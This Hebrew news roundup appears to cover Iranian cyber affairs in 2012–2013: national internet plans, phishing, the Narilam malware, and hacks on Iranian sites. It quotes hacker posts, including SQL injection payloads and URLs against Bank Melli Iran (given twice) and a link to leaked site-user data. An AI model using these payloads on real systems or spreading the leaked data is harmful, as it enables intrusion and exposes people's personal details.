איראן מבקשת מגוגל לשמור עותק מהתעבורה בשרתים במדינה

מחמד עלי אריאניאן, מנהל חברת תשתיות התקשורת של איראן, אמר לאחרונה כי גוגל ויאהו צריכות לשמור עותק מהמידע שלהן בשרתים באיראן, זאת על מנת להקל את הגישה למידע למשתמשי האינטרנט במדינה.

הבכיר טען כי הואיל ורבים מתושבי איראן משתמשים בשרותי שתי החברות, עליהן לשמור עותקים מהמידע שלהן באיראן, "אנו מעוניינים במשא ומתן עם מנהלי החברות לצורך שיתוף פעולה" והוסיף כי גוגל משתפת פעולה עם ממשלת תורכיה במתכונת שכזו, "אנו מוכנים להעתיק מודל זה ולספק חוות שרתים באיראן".

הפניה לשתי חברות אלו היא ככל הנראה בשל העובדה כי שרותי הדוא"ל שלהן הנחשבים לפופולריים ביותר באיראן למרות נסיונות ליצור אתרים מקומיים אשר יציעו שרותי דוא"ל.

עוד נטען כי צעד זה מהווה חלק מתוכניתה של איראן ליצירת רשת אינטרנט פנימית במדינה, אשר מתקדמת לאיטה החל משנת 2005. המטרה היא כי תושבי איראן ישתמשו רק ברשת פנימית זו ולנתק אותם מהאינטרנט המוכר לנו כיום. זאת הן כדי להגן על מוסר התושבים באמצעות יצירת שרותים ותכנים חלופיים לכל אשר האינטרנט הקיים מספק להם, והן כדי להגן על מוסדות המדינה ושרותיה השונים מפני נוזקות אשר תקפו אותה. אין הכוונה רק ל-Stuxnet אשר פגע במתקני הגרעין במדינה, אלא גם לידועות פחות דוגמת Flame, Shamoon, Mahdi אשר מטרתן היתה נזק וריגול באיראן.

בטרם פנתה איראן ליצירת רשת אינטרנט פנימית זו, היא עשתה שימוש – כרבות ממדינות האזור – בשרותים שמקורם במערב ובארה"ב לשם הגבלת אזרחיהן משימוש חופשי בסלולר ובאינטרנט.

אתר איראני חדש מאפשר השתתפות וירטואלית בשיעורי הלכה שיעית

הממסד הדתי באיראן השיק לאחרונה אתר חדש בשם "בית ספר הלכתי" המאפשר למשתמשי האינטרנט באיראן ומחוצה לה להשתתף באופן וירטואלי בשיעורי הלכה אסלאמית המועברים על-ידי אנשי-דת בכירים במרכזים השיעים הגדולים באיראן, בעיראק, באפגניסטאן ובלבנון. האתר פועל בפרסית ובערבית.

אחמד מאלכי, מיוזמי הקמת האתר, אמר בריאיון לסוכנות הידיעות האיראנית "מהר", כי האתר נועד לאפשר לגולשים להפיק תועלת מתכנים המועברים במסגרת כיתות לימוד המתקיימות במכללות הדתיות החשובות באיראן ובעולם השיעי. האתר מאפשר לתלמידי-דת להשתתף בשיעורים בנושאי הלכה, פרשנות, משפט מוסלמי ופילוסופיה מוסלמית המועברים בשידור חי  או להוריד אותם כקבצי שמע להאזנה במצב לא מקוון.

האתר גם מציע שימוש בחינם בשירותי ספריה וירטואלית הכוללת כ-9,000 ספרים בנושאי הלכה ואסלאם וכן בשירות "ויקי-פקה" (wikifeqh, "ויקי-הלכה") המכיל מאמרים שנכתבו על-ידי תלמידי-דת בנושאים שונים הקשורים להלכה מוסלמית. עוד מכיל האתר קישור לעשרות הרצאות של אנשי-דת שיעים הנגישים כקבצי שמע.

האתר החדש מצטרף ליוזמות נוספות שהושקו בשנים האחרונות במסגרת מאמץ גובר מצד הממסד הדתי באיראן להרחיב את השימוש בטכנולוגיות תקשורת ומחשבים לצרכי חינוך, לימוד והסברה. אנשי-דת שיעים בכירים עושים כיום שימוש נרחב באינטרנט ובטכנולוגיות סלולאריות לצורך מתן פסקי הלכה, שירותי ייעוץ דתי וביצוע "העלאות בגורל". רוב אנשי-הדת השיעים הבכירים מפעילים אתרי אינטרנט רשמיים המתוחזקים בדרך-כלל על-ידי תלמידיהם. בעבר כבר השיקה המכללה הדתית במרכז הדתי השיעי בעיר קום שבאיראן שירות המאפשר לגולשים לצפות ולהאזין לשיעורי-דת המועברים על-ידי אנשי-דת בכירים במכללות הדתיות באיראן ובעיראק.

ראש ארגון ההסברה האסלאמית, מהדי ח'אמושי, הדגיש בעבר בפגישה עם מרצים להלכה מוסלמית את הצורך לעשות שימוש בטכנולוגיה מתקדמת לצרכי חינוך והסברה. גם אמצעי תקשורת שמרנים באיראן בירכו על היוזמה לאפשר לגולשים גישה וירטואלית לשיעורי-דת וטענו, כי היא מסייעת להפיץ את תרבות האסלאם בקרב צעירים, במיוחד בתקופה בה המערב מנהל מתקפה תרבותית כנגד האסלאם.

מפקד הלוחמה הקיברנטית באיראן חוסל

בשעות הערב של ה-2 באוקטובר דווח באמצעי תקשורת שונים על כך שמג'תבא אחמדי, מפקד הלוחמה הקיברנטית של איראן נמצא מת באזור מיוער ליד העיר כאראג'. הוא נראה לאחרונה עוזב את ביתו ביום שבת (28 ספטמבר) ומאוחר יותר נמצאה גופתו לאחר שנורה בשני כדורים בליבו.

עדי ראיה מסרו כי נראה שהאיש חוסל מטווח קצר באמצעות אקדח. מפקד משטרה מקומי ציין כי שני חשודים רכובים על אופנוע מעורבים ברצח. דיווחים במערב מתייחסים לכך כי עובדת מותו של אחמדי אושרה על ידי הגוף עליו פיקד. עוד נמסר כי האיש היה מומחה בהגנה קיברנטית.

בכתבה באתר האיראני אלבורז, ובה שתי תמונות מזירת הארוע, נמסר כי אכן נרצח אדם בשם זה אשר היה ממפקדי משמרות המהפכה במחוז אלבורז, אולם לא צויין שיוכו לתחום לוחמת הסייבר.

ידיעה בנושא וכן תמונות אלה התפרסמו אתמול גם באתר "קציני הלוחמה הרכה" של איראן.

האקר ישראלי פרץ לאתר רשות השידור האיראנית

ב-17 באוגוסט נודע כי ההאקר הישראלי המזוהה כ-Yourikan פרץ לאתר רשות השידור האיראנית והצליח להשיג שליטה על ניהול האתר. בהודעתו הוא פרסם כחמישים שמות משמש וסיסמאות אשר לדבריו שייכות למערכת ניהול אתר זה, כמו גם פרטי גישה למערכת זו אשר אלו שונו על ידו.

להוכחת טענתו הוא פרסם מספר צילומי מסך המעידים על הפריצה למערכת הניהול;

בנוסף הוא פרץ לאחד מהכתובות השייכות לרשות השידור האיראנית והשאיר בה את הודעתו;

האקר זה מרבה לפרוץ לאתרים לבנוניים ואיראניים, במסגרת זו דווח לפני מספר ימים על פריצה אשר בוצעה לידו לאתר ממשלתי לבנוני; האתר הרשמי של מחוז בעלבכ.

פריצה לאתר נשיא איראן ולמערכת המחשב של עיריית שיראז

ההאקר הישראלי המכונה Yourikan הודיע ב-26 ביוני כי עלה בידו לפרוץ לאתר הפרטי של נשיאה החדש של איראן, חסן רוחאני. עם הודעתו, פרסם ההאקר קישור לקובץ ובו פרטיהם של כל אלו אשר נרשמו לאתר או נכנסו אליו;

http://www.hassanrouhani.ir

i had chosen to publish the list of all users that have register to the site (according to there city address )

they have register here :
http://www.hassanrouhani.ir/register.php
and log in here:
http://www.hassanrouhani.ir/login.php

you can find all the list of users and there details here :
https://anonfiles.com/file/b9d19c0fee1fb2af872d8896c515e1cf

( a rar file that contain all the info )
i.e
the file "tehran-1392-01-23-1392-02-23.csv" and more of them (some
without password , only details)

as always i say:
"say no to terror "
"say no to nuclear iran"

you-r!-k@n

הקובץ המכווץ כולל 502 קבצי אקסל, בחתך ערים במדינה, אשר תאריכיהם מה-12 מאי 2013 ועד 11 יוני 2013. הקבצים מכילים בין השאר את תאריך הפעולה במערכת, כתובת דוא"ל ושם המשתמש וכן עמודות ובהן פרמטרים נוספים.

בנוסף פרסם ההאקר הודעה נוספת ובה טען כי עלה בידו לפרוץ למערכות המחשב של עיריית שיראז באיראן;

the shiraz (city in iran )  municipality internal network has been hacked by you-ri-k@n
i hacked into the internal systems
you can find some of the credential in the screenshot attach
say no to nuclear iran !
you-r!-k@n
the shiraz (city in iran )  municipality internal network has been
hacked by you-ri-k@n
i hacked into the internal systems
you can find some of the credential in the screenshot attach
say no to nuclear iran !
you-r!-k@n

הודעתו זו כוללת שני צילומי מסך; האחד של מסך הכניסה למערכת ובו עדות לדבר הפריצה.

השני הוא מתוך המערכת עצמה וכולל נתוני גישה ופרטי משתמשים במערכת מחשב פנימית זו.

אין זו הפעם הראשונה שהאקר זה פועל נגד אתרים ויעדים איראנים וכאלה של בעלות בריתה; באוגוסט 2012 הוא טען לפריצה והשחתה של 91 אתרים איראניים ולאתר חזבאללה. באוקטובר אותה שנה לאתר לבנוני ולאחרונה הוא מסר על פריצה שלו לשרתי חברת תעופה איראנית.

פריצה של האקר ישראלי לאתר איראני

בהמשך לעליה בהיקף הפעילות של האקרים ישראליים בעת האחרונה, פרסם בשעות הערב של ה-23 יוני ההאקר Zeus Israel הודעה בדבר פריצה אשר ביצע לאתר איראני בשם Vista.

ההודעה כוללת פרטי 2,041 כתובות מייל וסיסמאות מוצפנות אשר מקורן ככל הנראה באתר שנפרץ. אלו מסודרות אלפאבתית לפי שם המשתמש בכתובת המייל, על פי רוב שמות איראניים.

מרבית הכתובות בעלות סיומת Gmail.com, Yahoo.com. בנוסף אותרו מספר כתובות איראניות דוגמת IRANCELL.IR, chmail.ir, aspek.ir, mosavibahraini.ir, mihanmail.ir ואחרות.

לא מן הנמנע כי רשימה זו היא של כתובות מייל וסיסמאות גישה אותם הזינו המשתמשים בעת רישום לאתר שנפרץ. כלומר, לא בהכרח סיסמאות גישה לחשבונות המייל. כבעבר, יעידו על כך כתובות מייל הנראות שגויות או לא מקובלות (גם אם כמותן זניחה בהשוואה לכתובות האמת), לדוגמא; info.farsibiz@gmali.com. לצד עשרות כתובות אשר בהן מופיע www בתחילת כתובת המייל – www.afarin@yahoo.com.

ir,

האקר ישראלי טוען כי פרץ לאתר בנק איראני

ב-13 ביוני פרסם ההאקר הישראלי Amenefus הודעה ובה פנה ל-An0nGhost ולתושבי איראן בטענה כי עלה בידו לפרוץ לאתר של Bank Melli Iran. להוכחת דבריו הוא פרסם את הפרטים הבאים;

Target; wWw.BMi.iR (Bank Melli Iran)
Look kids(=An0nGhost). this is how to SQLi a bank in Iran.[!]


Blind SQLi 1;
http://bmi.ir/fa/objectslist.aspx
————————————————————————————
|GET input tid was set to -1' or 67 = '65                                          |
|code: POST /fa/objectslist.aspx?cid=5&smnuid=34&tid=-1%27%20or%2067%20%3d%20%2765 |
————————————————————————————

Blind SQLi 2;
http://bmi.ir/fa/publishlist.aspx
————————————————————————————
|POST input ctl00%24Footer2%24ImageButtonRSSFeed was set to -1' or 36 = '34        |
|POST /fa/publishlist.aspx?cid=0&page=2                                            |
————————————————————————————

succeed with SQLMap, nMap, Havij, BlindCat.

13 июня, израильский хакер, известный как "Amenefus", опубликовал заявление об успешном взломе сайта иранского банка " Bank Melli Iran". Для подтверждения он опубликовал следующие данные:

Target; wWw.BMi.iR (BankMelliIran)

Look kids(=An0nGhost). this is how to SQLi a bank in Iran.[!]

Blind SQLi 1;

http://bmi.ir/fa/objectslist.aspx

————————————————————————————

|GET input tid was set to -1′ or 67 = '65                                          |

|code: POST /fa/objectslist.aspx?cid=5&smnuid=34&tid=-1%27%20or%2067%20%3d%20%2765 |

————————————————————————————

Blind SQLi 2;

http://bmi.ir/fa/publishlist.aspx

————————————————————————————

|POST input ctl00%24Footer2%24ImageButtonRSSFeed was set to -1′ or 36 = '34        |

|POST /fa/publishlist.aspx?cid=0&page=2                                            |

————————————————————————————

succeed with SQLMap, nMap, Havij, BlindCat.

התקפת פישינג על משתמשי מייל באיראן

בתאריך 12 ביוני פורסם ב-Google Online Security Blog פוסט מאת סגן הנשיא להנדסת אבטחה בחברה, לפיו עשרות אלפי משתמשי Gmail ברחבי איראן קיבלו הודעות מייל הנחזות להיות מאת החברה המפתות את המקבלים אותן להכנס לעמודים יעודיים ולהזין את פרטי גישה אשר יגיעו לידי מבצעי פעולת ההונאה. פעולת פישינג זו ("דיוג") מהווה לטענת הבכיר מהלך רחב היקף בן שלושה שבועות אשר מקורו בתוככי איראן. לשיטתו, התזמון והמטרות של פעולות אלו מעידים על האפשרות כי התקפות אלה מונעות משיקולים פוליטיים וקשורות בבחירות לנשיאות אשר תתקיימנה במדינה ב-14 ביוני.

על מנת להגן על משתמשי האינטרנט מפני תופעות שכאלה, Google נוהגת לפרסם הודעות למשתמשים אשר חשודים כמצויים תחת התקפת פישינג מטעם מדינה.

לפרסום זה של Google נרשמה הודעה מאת איראני המתגורר מחוץ למדינה המעיד כי גם הוא היה נתון להתקפות דומות;

מהלך זה, גם אם מקורו אכן במשטר האיראני, אינו מפתיע כלל ועיקר. בכל מערכות הבחירות באיראן בשנים האחרונות, היינו עדים למימוש מגוון רחב של הגבלות שלטוניות על שימוש חופשי באינטרנט. פעילויות שהחלו בצורה שיטתית מספר חודשים לפני כל מערכת בחירות והופסקו בהדרגה זמן מה לאחר סיומן של אלו. דוגמא לכך היתה בבחירות הקודמות לנשיאות שהתקיימו ביוני 2009, במהלכן סגרו השלטונות את האינטרנט והשתמשו בו כדי לצוד את מתנגדיו במהלך המהומות שלאחריהן.

במסגרת מסע הבחירות הנוכחי דווח ב-30 במרץ השנה על מעצרו של בלוגר בן 14 במדינה. לאור נסיון העבר, סביר כי גל של פעילויות אלו נגד משתמשי האינטרנט במדינה, ישכך בהדרגה בחודשים הקרובים.

האקר ישראלי פרץ לשרתי חברת תעופה איראנית

בשעות הצהריים של ה-9 ביוני פרסם ההאקר הישראלי Yourikan כי עלה בידו לפרוץ לשרתי חברת התעופה האיראנית Iran Airtour Airline.

במהלך הארוע הוא חדר למערכות המחשב המרכזיות של החברה והשיג שליטה מלאה על רשת המחשבים המשרתת לדבריו 211 עובדים. בהודעתו נמסר כי היה ביכולתו לגרום לנזק ממשי למערכת המחשב של החברה ובמקום זאת בחר להציב את המסר הבא;

Say no to nuclear Iran

Say no to terror

This is the salary portal!

And all the accounting info.

Also I have rdp to all servers!

להוכחת דבריו, הוא פרסם ארבעה צילומי מסך משרתים אלו;


עדכון משעה 17:43

האקר זה פרסם עדכון להודעתו המקורית;

update
the public web site is back , but all the intrernal (intranet) portals  are down – all the active directory was deleted from the domain controlers the orginztation is down , they cannot work!!!
big damage!

"אנונימוס" במבצע חדש נגד איראן

ב-23 במרץ החלו גורמים ב"אנונימוס" במבצע מקוון חדש נגד איראן (OpIranMenace), תוך בחירת מטרות אסטרטגיות בה. בהודעה שפורסמה בתאריך זה נמסר כי גורמים אלו שמו להם למטרה את מדינות השריעה באזורנו, איראן תחילה ולאחריה עיראק וערב הסעודית.

בהודעה פורטה רשימת הגופים באיראן אשר נפרצו;

  • Arkaline CO -ARKA PETROGAS PIPELINE
  • Aban-Sanat- Kara Co – Iranian hydro-mechanical and electrical equipment of dams and water powerhouses
  • Iran Export Development Bank – well known under sanctions Iranian bank
  • NISOC – Iranian Oil Company
  • United Nations office in Tehran – we pwned their intranet and also gained full access
  • to UN ATLAS system not only in Iran (thats another story)

עוד נכלל קישור ובו 55 תמונות של מסמכים אשר הושגו במהלך הפריצה וקישור לקובץ עצמו. קובץ מכווץ במשקל 140 MB המכיל 482 קבצים שונים ( PPS, PPT, GIF ,ZIP, TIFF, PNG, PDF, MPP, DOC, FRW, DWG, XLSX, JPEG) אשר תאריך כולם הוא ה-21-23 מרץ 2013.

קובץ זה מכיל בין היתר;

  • סריקות של מסמכים והתכתבויות
  • קבצי העברות בנקאיות (Q1 2012, Q1 2013)
  • דוחות כספיים
  • דוחות פעילות
  • רשימת אנשי קשר, ככל הנראה של נציגות האו"ם באיראן, הכוללת לצד פרטים אישיים ותפקיד גם סוג הדם, אלרגיות, א"'ק (תג"מ, תגמ"ג)
  • רשימת א"ק של נציגויות האו"ם באיראן
  • קובץ ובו כ-180 פרטי אנשי האו"ם באיראן (זרים ומקומיים), תפקידם ומספרי טלפון (נכון ל-13 מרץ 2013)
  • טפסים
  • סיכומי דיון
  • מצע לדיון מה-11 מרץ 2013
  • קורות חיים (אנגלית, ערבית ופרסית)
  • עץ הררכיית ההתקשרות של UNFPA באיראן
  • תוכנית עבודה לשנת 2013
  • תבנית מכתב אישור מאת נציגות האו"ם באיראן המתיר למציגו לשאת מכשיר קשר תג"מ
  • טבלת שכר של נציגות ה-UNDP באיראן בחתך בעלי תפקידים
  • מספר תלושי שכר (Q1 2013) של UNFPA
  • מסמכים של חברות Pars Online, SANICO, AMTRAK, Rahrovane Modiriate, ARKALINE,RASHAK, Hoopad Darya, GPAS (בכלל זה תרשים גאנט ושרטוטי מכשיר)
  • מסמך של שגרירות מקסיקו בטהראן בדבר ספר תנחומים שהוצב בשגרירות בתאריכים 4,5 פברואר 2013
  • מכתב של ה-UNDP מה-12 מרץ 2013 העוסק במחסור במטבע באיראן המשפיע על פעילות הנציגויות במדינה

כעבור שבוע ימים פורסמה הודעה נוספת מטעם אותם גורמים ב"אנונימוס" ובה תכתובת מה-25 במרץ של גורמי או"ם באיראן המתייחסות לכך כי חומרים של הארגון במדינה דלפו. דבר זה מעיד כי ככל הנראה פירצת האבטחה לא תוקנה וכי לפחות יומיים לאחר הפרסום, עדיין היתה לגורמי "אנונימוס" גישה לפחות לחלק מהמחשבים שנפרצו.

האם נוזקה חדשה תוקפת את איראן ?

בתאריך 15 נובמבר אותרה על ידי חברת Symantec נוזקה חדשה אשר יתכן ויעדה הוא איראן.

נוזקה זו קרויה Narilam ובדוח שהוכן על ידי חברת Symantec היא מתוארת כתולעת המעתיקה עצמה לכל הכוננים במחשב היעד כמו גם למספר תיקיות משותפות. ניתוח זה מתייחס לתולעת כממוקדת ביותר;

Threat Assessment

Wild

  • Wild Level: Low
  • Number of Infections: 0 – 49
  • Number of Sites: 0 – 2
  • Geographical Distribution: Low
  • Threat Containment: Easy
  • Removal: Easy

Damage

  • Damage Level: Low

Distribution

  • Distribution Level: Medium
  • Shared Drives: Attempts to spread through shared folders.
  • Target of Infection: Spreads through removable drives.

דוח מורחב יותר של חברה זו מתייחס לתולעת כאל "Business Database Sabotage".  אכן, ייחודה של זו בכך שהיא תוקפת ככל הנראה בסיסי נתונים מבוססי MS SQL.

הדוח מציין כי מניתוח הקוד, אשר כבמקרים קודמים נכתב אף הוא בשפת Delphi,  עולה כי אין בכוונת הנוזקה לגנוב נתונים מבסיס הנתונים של מחשב המטרה, אלא כל מטרתה היא להזיק לנתונים השמורים בבסיס הנתונים הנגוע. עוד עולה כי ככל הנראה מטרת הנוזקה בסיסי נתונים העוסקים בהזמנות, הנהלת חשבונות, ניהול לקוחות וכאלו השייכים לתאגידים וכי המשתמשים שהושפעו ממנה הם אלו הארגוניים. כמו גם בשל סוג בסיס הנתונים אשר על פי רוב לא נמצא ברשות המשתמש הביתי.

עוד מוסיף דוח כי זה במידה ולא קיימים מערכי גיבוי מתאימים, יהיה קושי לשחזר את בסיס הנתונים הנגוע וכי הארגון שנפגע יסבול מהפרעות ממשיות ואף מנזקים כלכליים בעת שחזור בסיס הנתונים, פעולה אשר לטענת הדוח יכולה להמשך זמן רב בשל אופיה של הנוזקה.

ממפה אשר כלולה בדוח ניתן ללמוד כי מרבית פגיעותיה של נוזקה זו היו באיראן;

עודכן ב-21:11 בתאריך 27112012

סקירה של Tremd Micro אודות נוזקה זו.

הפעילות המקוונת של חאמנהאי

מנהיגה הרוחני של איראן מקיים פעילות ענפה למדי באינטרנט וברשתות החברתיות, בעיקר בהתחשב בקיצוניות הדתית של המשטר הדתי באיראן ולאור פעילות הנהגת המדינה לממש איטרנט פנימי וכשר בה.

במסגרת פעילותו המקוונת, קיים למנהיגה הרוחני של איראן אתר אינטרנט הפעיל בלא פחות מ-13 שפות שונות.

בנוסף, קיים חשבון טוויטר ובו 3,172 דיווחים (בעיקר בשפה האנגלית, וחלקם בפרסית) וכ-7,000 עוקבים.

לשם ניהול המולטימדיה קיימים חשבונות בשלוש רשתות חברתיות שונות;

חשבון ב-Twitpic ובו 126 תמונות, כמו גם חשבון ב-Instagram אשר בו 1,156 עוקבים אחר 15 התמונות שבו.

בנוסף קיים ערוץ ב-Youtube אשר בו 79 סרטים שהועלו החל ב-9 דצמבר 2007 ונצפו למעלה מ-774 אלף פעם.

ב-21 נובמבר דווח בחשבון הטוויטר שלו כי נפתח חשבון גם ברשת החברתית +Google, אולם הקישור שצורף בהודעה אינו תקין.